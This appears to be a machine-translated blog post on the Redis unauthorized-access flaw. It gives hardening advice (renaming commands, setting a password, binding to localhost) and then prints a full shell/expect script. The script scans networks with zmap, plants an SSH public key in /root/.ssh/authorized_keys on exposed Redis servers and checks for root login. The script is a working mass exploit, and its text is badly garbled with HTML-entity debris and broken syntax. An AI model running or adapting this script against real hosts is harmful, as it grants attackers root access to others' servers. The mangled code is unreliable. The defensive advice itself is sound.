Redis SSH Bug Fix method

First, preface

In the previous period, in the evaluation of the impact of the intranet to write a scan using a small script,
After scanning the statistics found that the intranet in 60% open the redis6379 port host is in a dangerous state can be exploited, because it is a default configuration caused by
Given that most of the developers in our community use Redis, we share it so that you can do a troubleshooting on your company's intranet. Second, the vulnerability introduction

Redis, by default, is bound to 0.0.0.0:6379, which exposes the Redis service to the public, and if no authentication is turned on, it can cause any user who has access to the target server without authorization to access Redis and to read Redis data. An attacker who is not authorized to access Redis can take advantage of the methods of Redis to successfully write the public key on the Redis server, and can then log on directly to the target server using the corresponding private key.

Intrusion characteristics: Redis may have performed the Flushall method, the entire Redis database is emptied in the Redis database, a new key-value pair named Crackit (a command instruction that is circulated on the web) is created with the content of an SSH public key. Create a new or modified Authorized_keys file under the/root/.ssh folder, which is a Redis-generated DB file containing the above public key , fix recommendation 1. Prohibit some high-risk commands

Modify the redis.conf file to add

Rename-command flushall ""
rename-command CONFIG ""
rename-command EVAL ""

To disable remote modification of the DB file address 2. Running Redis services with low privileges

Create a separate user and home directory for the Redis service, and configure disable login 3. Add password verification to Redis

Modify the redis.conf file to add

Requirepass MyPassword

4. Prohibit extranet access to Redis

Modify the redis.conf file, add or modify

Bind 127.0.0.1

Make Redis service available only on current host Four, scan tool 1 usage Instructions

#以Ubuntu为例
 su

 # Requirements
 apt-get install redis-server expect zmap

 git clone https://github . com/qingxp9/yyfexploit
 CD Yyfexploit/redis

 # scan 6379 Port
 # If you want to sweep the intranet, put the/etc/zmap/zmap.conf in the Blacklist-file This line commented out
 zmap-p 6379 10.0.0.0/8-B 10m-o ip.txt

 # Usage
 ./redis.sh ip.txt

Finally, several TXT files will be generated to record the results
which
Runasroot.txt means Redis is not certified and runs as root
Noauth.txt means Redis is not certified but runs as a normal user
Rootshell.txt has been written to the public key and can log in directly to the root user

Like this:

Ssh-i Id_rsa root@x.x.x.x 2 tool source code

Just put the code on it, everyone, Daniel, please watch it with your parents.

   #!/bin/sh    if [$#-eq 1  ]    then      ip_list=$1     & nbsp;# #create id_rsa      echo "****************************************create id_rsa file"   &nbsp ;  expect-c "       spawn ssh-keygen-t rsa-f id_rsa-c \" yyf\ "       EXP ECT {           \ "*passphrase): \" {              &NB Sp;exp_send \ "\r\"                exp_continue         &NBSP ; &NBSP,}            \ "*again: \" {               e Xp_send \ "\r\"            }            \ "*y/n"?
 \ "{               exp_send \" N\r\ "           }        } &nbsp      expect EOF       "     echo" \n\n************************************ Attack Targets "     touch noauth.txt runasroot.txt rootshell.txt haveauth.txt      i= 0      cat $ip _list |
 While read IP      do        i= ' expr $i + 1 ';         #write id_rsa.pub to remote        echo ' *****${i}***connect to remote ${i  P} redis "       expect-c"          set Timeout 3           spawn redis-cli-h $ip config set dir/root/.ssh/         expect {           \ "Ok\"            ,            {EX  It 0}            \ "ERR changing directory:permission denied\"         {Exit 1}            timeout                       {e)  XIT 2}            \ "(Error) Noauth authentication required\"         { Exit 3}          }         "       case $? In            0)  echo "Run Redis as root"                echo $ip >> noauth.txt                echo $ip >> Runasr
 Oot.txt            ;;            1)  echo "not run Redis as root\n\n\n"           & nbsp    echo $ip >> noauth.txt                continue    
        ;;            2)  echo "ConneCT timeout\n\n\n "               continue           &NB
 SP;;;             3)  echo "with auth\n\n\n"                echo $ip >> haveauth.txt                continue     &NBS P
      ;; 
        ESAC         (echo-e "\ n"; Cat id_rsa.pub; echo-e "\ n") > Foo.txt        cat Foo.txt | Redis-cli-h $IP-X Set 1        redis-cli-h $ip config set dir/root/.ssh/      &N Bsp;redis-cli-h $ip config set dbfilename "Authorized_keys"        REDIS-CLI save     &N Bsp   #login test        echo "#try to login"        expect-c "         set Timeout 5         &Nbsp;spawn ssh-i id_rsa root@ $ip echo \ "yyf\"          expect {        &N Bsp  \ "*yes/no\"     {send \ "yes\n\"}            \ "*password\"   {send \ "\003\"; Exit 1}            \ "yyf\"         {exit 0}       &N Bsp    timeout         {exit 2}          }       &NB Sp

  exit 4         "       exitcode=$?         if [$exitcode-eq 0]        then          echo "---------------${ip} is get root shell"          echo $ip >> rootshell.txt   &NBSP ;    FI        echo "\n\n\n"      done      echo "######### #Final count########## "  &NBSp  wc-l $ip _list      echo "----------"      wc-l noauth.txt      WC -L runasroot.txt      wc-l rootshell.txt      echo "----------"      WC- L haveauth.txt    else      echo "usage:./redis.sh ip.txt"    FI

v. Related REFERENCEShttp://zone.wooyun.org/content/23858 https://blog.islandzero.net/2015/11/11/redis-crackit/http:// blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/

If the code is not properly written, look